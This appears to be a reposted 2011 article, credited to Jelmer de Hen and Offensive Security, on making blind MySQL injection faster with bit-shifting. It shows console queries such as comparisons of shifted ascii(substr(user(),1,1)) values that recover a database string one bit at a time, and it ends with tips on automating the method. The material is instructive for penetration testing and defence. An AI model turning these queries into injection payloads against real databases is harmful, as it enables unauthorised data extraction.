来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] #### http://h.ackack.net/faster-blind-mysql-injection-using-bit-shifting.html for a HTML version# Made by Jelmer de Hen# H.ackAck.net#####While strolling through mysql.com I came ......
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# http://h.ackack.net/faster-blind-mysql-injection-using-bit-shifting.html for a HTML version # Made by Jelmer de Hen # H.ackAck.net ##### While strolling through mysql.com I came across this page http://dev.mysql.com/doc/refman/5.0/en/bit-functions.html. There you can view the possibility of the bitwise function right shift. A bitwise right shift will shift the bits 1 location to the right and add a 0 to the front. Here is an example: mysql> select ascii(b'00000010'); +--------------------+ | ascii(b'00000010') | +--------------------+ | 2 | +--------------------+ 1 row in set (0.00 sec) Right shifting it 1 location will give us: mysql> select ascii(b'00000010') >> 1; +-------------------------+ | ascii(b'00000010') >> 1 | +-------------------------+ | 1 | +-------------------------+ 1 row in set (0.00 sec) It will add a 0 at the front and remove 1 character at the end. 00000010 = 2 00000010 >> 1 = 00000001 ^ ^ 0 shifted So let's say we want to find out a character of a string during blind MySQL injection and use the least possible amount of requests and do it as soon as possible we could use binary search but that will quickly take a lot of requests. First we split the ascii table in half and try if it's on 1 side or the other, that leaves us ~64 possible characters. Next we chop it in half again which will give us 32 possible characters. Then again we get 16 possible characters. After the next split we have 8 possible characters and from this point it's most of the times guessing or splitting it in half again. Let's see if we can beat that technique by optimizing this - but first more theory about the technique I came up with. There are always 8 bits reserved for ASCII characters. An ASCII character can be converted to it's decimal value as you have seen before: mysql> select ascii('a'); +------------+ | ascii('a') | +------------+ | 97 | +------------+ 1 row in set (0.00 sec) This will give a nice int which can be used as binary. a = 01100001 If we would left shift this character 7 locations to the right you would get: 00000000 The first 7 bits are being added by the shift, the last character remains which is 0. mysql> select ascii('a') >> 7; +-----------------+ | ascii('a') >> 7 | +-----------------+ | 0 | +-----------------+ 1 row in set (0.00 sec) a = 01100001 01100001 >> 7 == 00000000 == 0 01100001 >> 6 == 00000001 == 1 01100001 >> 5 == 00000011 == 3 01100001 >> 4 == 00000110 == 6 01100001 >> 3 == 00001100 == 12 01100001 >> 2 == 00011000 == 24 01100001 >> 1 == 00110000 == 48 01100001 >> 0 == 01100001 == 97 When we did the bitshift of 7 we had 2 possible outcomes - 0 or 1 and we can compare it to 0 and 1 and determine that way if it was 1 or 0. mysql> select (ascii('a') >> 7)=0; +---------------------+ | (ascii('a') >> 7)=0 | +---------------------+ | 1 | +---------------------+ 1 row in set (0.00 sec) It tells us that it was true that if you would shift it 7 bits the outcome would be equal to 0. Once again, if we would right shift it 6 bits we have the possible outcome of 1 and 0. mysql> select (ascii('a') >> 6)=0; +---------------------+ | (ascii('a') >> 6)=0 | +---------------------+ | 0 | +---------------------+ 1 row in set (0.00 sec) This time it's not true so we know the first 2 bits of our character is "01". If the next shift will result in "010" it would equal to 2; if it would be "011" the outcome would be 3. mysql> select (ascii('a') >> 5)=2; +---------------------+ | (ascii('a') >> 5)=2 | +---------------------+ | 0 | +---------------------+ 1 row in set (0.00 sec) It is not true that it is 2 so now we can conclude it is "011". The next possible options are: 0110 = 6 0111 = 7 mysql> select (ascii('a') >> 4)=6; +---------------------+ | (ascii('a') >> 4)=6 | +---------------------+ | 1 | +---------------------+ 1 row in set (0.00 sec) We got "0110" now and looking at the table for a above here you can see this actually is true. Let's try this on a string we actually don't know, user() for example. First we shall right shift with 7 bits, possible results are 1 and 0. mysql> select (ascii((substr(user(),1,1))) >> 7)=0; +--------------------------------------+ | (ascii((substr(user(),1,1))) >> 7)=0 | +--------------------------------------+ | 1 | +--------------------------------------+ 1 row in set (0.00 sec) We now know that the first bit is set to 0. 0??????? The next possible options are 0 and 1 again so we compare it with 0. mysql> select (ascii((substr(user(),1,1))) >> 6)=0; +--------------------------------------+ | (ascii((substr(user(),1,1))) >> 6)=0 | +--------------------------------------+ | 0 | +--------------------------------------+ 1 row in set (0.00 sec) Now we know the second bit is set to 1. 01?????? Possible next options are: 010 = 2 011 = 3 mysql> select (ascii((substr(user(),1,1))) >> 5)=2; +--------------------------------------+ | (ascii((substr(user(),1,1))) >> 5)=2 | +--------------------------------------+ | 0 | +--------------------------------------+ 1 row in set (0.00 sec) Third bit is set to 1. 011????? Next options: 0110 = 6 0111 = 7 mysql> select (ascii((substr(user(),1,1))) >> 4)=6; +--------------------------------------+ | (ascii((substr(user(),1,1))) >> 4)=6 | +--------------------------------------+ | 0 | +--------------------------------------+ 1 row in set (0.00 sec) This bit is also set. 0111???? Next options: 01110 = 14 01111 = 15 mysql> select (ascii((substr(user(),1,1))) >> 3)=14; +---------------------------------------+ | (ascii((substr(user(),1,1))) >> 3)=14 | +---------------------------------------+ | 1 | +---------------------------------------+ 1 row in set (0.00 sec) 01110??? Options: 011100 = 28 011101 = 29 mysql> select (ascii((substr(user(),1,1))) >> 2)=28; +---------------------------------------+ | (ascii((substr(user(),1,1))) >> 2)=28 | +---------------------------------------+ | 1 | +---------------------------------------+ 1 row in set (0.00 sec) 011100?? Options: 0111000 = 56 0111001 = 57 mysql> select (ascii((substr(user(),1,1))) >> 1)=56; +---------------------------------------+ | (ascii((substr(user(),1,1))) >> 1)=56 | +---------------------------------------+ | 0 | +---------------------------------------+ 1 row in set (0.00 sec) 0111001? Options: 01110010 = 114 01110011 = 115 mysql> select (ascii((substr(user(),1,1))) >> 0)=114; +----------------------------------------+ | (ascii((substr(user(),1,1))) >> 0)=114 | +----------------------------------------+ | 1 | +----------------------------------------+ 1 row in set (0.00 sec) Alright, so the binary representation of the character is: 01110010 Converting it back gives us: mysql> select b'01110010'; +-------------+ | b'01110010' | +-------------+ | r | +-------------+ 1 row in set (0.00 sec) So the first character of user() is "r". With this technique we can assure that we have the character in 8 requests. Further optimizing this technique can be done. The ASCII table is just 127 characters which is 7 bits per character so we can assume we will never go over it and decrement this technique with 1 request per character. Chances are higher the second bit will be set to 1 since the second part of the ASCII table (characters 77-127) contain the characters a-z A-Z - the first part however contains numbers which are also used a lot but when automating it you might just want to try and skip this bit and immediatly try for the next one. © Offensive Security 2011 |
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